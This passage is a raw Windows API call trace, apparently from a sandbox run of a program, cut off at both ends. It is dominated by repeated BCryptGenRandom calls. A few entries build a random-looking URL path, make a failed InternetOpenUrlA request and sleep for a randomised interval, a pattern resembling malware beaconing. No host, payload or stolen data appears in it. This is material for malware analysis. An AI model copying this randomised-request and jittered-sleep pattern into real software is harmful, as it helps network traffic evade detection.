hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.445] GetProcessHeap () returned 0x440000 [0198.445] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0198.445] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0198.445] lstrcatA (in: lpString1="\x81\x03", lpString2="/tbd395reCn5dcmvaFljpcpnj4hQ8xUu7cd0Z9ak2b57h/6s74e4Knljtk3cSFvqtbsi9ij4Qgj/Q6Ehdyu9c3eN87qmw6n9qqws9jxbv2neUt/" | out: lpString1="\x81\x03/tbd395reCn5dcmvaFljpcpnj4hQ8xUu7cd0Z9ak2b57h/6s74e4Knljtk3cSFvqtbsi9ij4Qgj/Q6Ehdyu9c3eN87qmw6n9qqws9jxbv2neUt/") returned="\x81\x03/tbd395reCn5dcmvaFljpcpnj4hQ8xUu7cd0Z9ak2b57h/6s74e4Knljtk3cSFvqtbsi9ij4Qgj/Q6Ehdyu9c3eN87qmw6n9qqws9jxbv2neUt/" [0198.445] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0198.445] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/tbd395reCn5dcmvaFljpcpnj4hQ8xUu7cd0Z9ak2b57h/6s74e4Knljtk3cSFvqtbsi9ij4Qgj/Q6Ehdyu9c3eN87qmw6n9qqws9jxbv2neUt/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0198.445] GetProcessHeap () returned 0x440000 [0198.445] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0198.445] GetProcessHeap () returned 0x440000 [0198.445] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a18060 | out: hHeap=0x440000) returned 1 [0198.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0198.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0198.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0198.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0198.446] Sleep (dwMilliseconds=0x1bfa9) [0198.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0198.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.777] GetProcessHeap () returned 0x440000 [0198.777] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4aa0 [0198.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4aa1, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d4aa1) returned 0x0 [0198.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.052] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.054] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4abe, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d4abe) returned 0x0 [0199.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0199.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.060] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4aed, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d4aed) returned 0x0 [0199.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.068] GetProcAddress 